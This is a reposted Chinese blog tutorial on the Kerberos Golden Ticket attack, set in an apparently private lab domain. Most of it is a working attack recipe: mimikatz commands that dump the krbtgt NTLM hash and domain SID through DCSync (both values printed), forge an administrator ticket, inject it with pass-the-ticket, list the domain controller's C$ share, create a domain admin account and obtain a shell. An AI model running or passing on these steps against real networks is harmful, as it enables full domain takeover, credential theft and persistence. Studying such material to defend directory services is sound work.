黃金票據的意思是,當攻擊者能夠獲取krbtgt的HTLM HASH后,攻擊者就可以偽造一張票據授權票,去偽造正域內的任意用戶訪問到域內kerberos認證的所有服務資源,
域搭建環境:
域名:taozhi.online
域控(server2008):
域內機器(win7):
所需條件:
域名稱:taozhi.online
域SID:
域控的krntgt賬戶的hash值
1.在域控機器上,查看域用戶net user,確認是否有krbtgt賬戶,
2.打開mimikatz,執行privilege::debug進行提權,
3. 執行log——lsadump::dcsync /user:krbtgt匯出查詢資訊(此時桌面會生成一個mimikatz的檔案,記錄里面的sid和Hash NTLM)
sid:S-1-5-21-2977540408-3764402457-1595006286
Hash NTLM:51a7dda975297923b6844020b8b1b5ac
4.在域內的任意一臺機器上執行(我這里用的是win7),訪問域控,拒絕訪問
dir \\WIN-AJP4CU7AVGF.taozhi.online\c$
生成黃金票據并匯入到記憶體
Kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ptt
打開新的cmd視窗,執行:dir \\WIN-AJP4CU7AVGF.taozhi.online\c$,可直接列出域控目錄
黃金票據利用(環境與上面一樣,此步驟5接著上面的步驟執行)
清除票據:
klist purge
5.在域內的任意一臺機器上執行(我這里用的是win7),生成黃金票據并匯入到記憶體,此時在mimikatz的檔案夾下還會生成一個ticket.kirbi的檔案
kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ticket:ticket.kirbi
通過mimikatz中的kerberos::ptt功能將ticket.kirbi匯入記憶體中,
kerberos::purge
kerberos::ptt tickett.kirbi
此時嘗試創建一個xxx的域管賬號,命令執行成功:
將pstools放入該臺機器的桌面,并解壓
成功拿到shell
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/356901.html
標籤:其他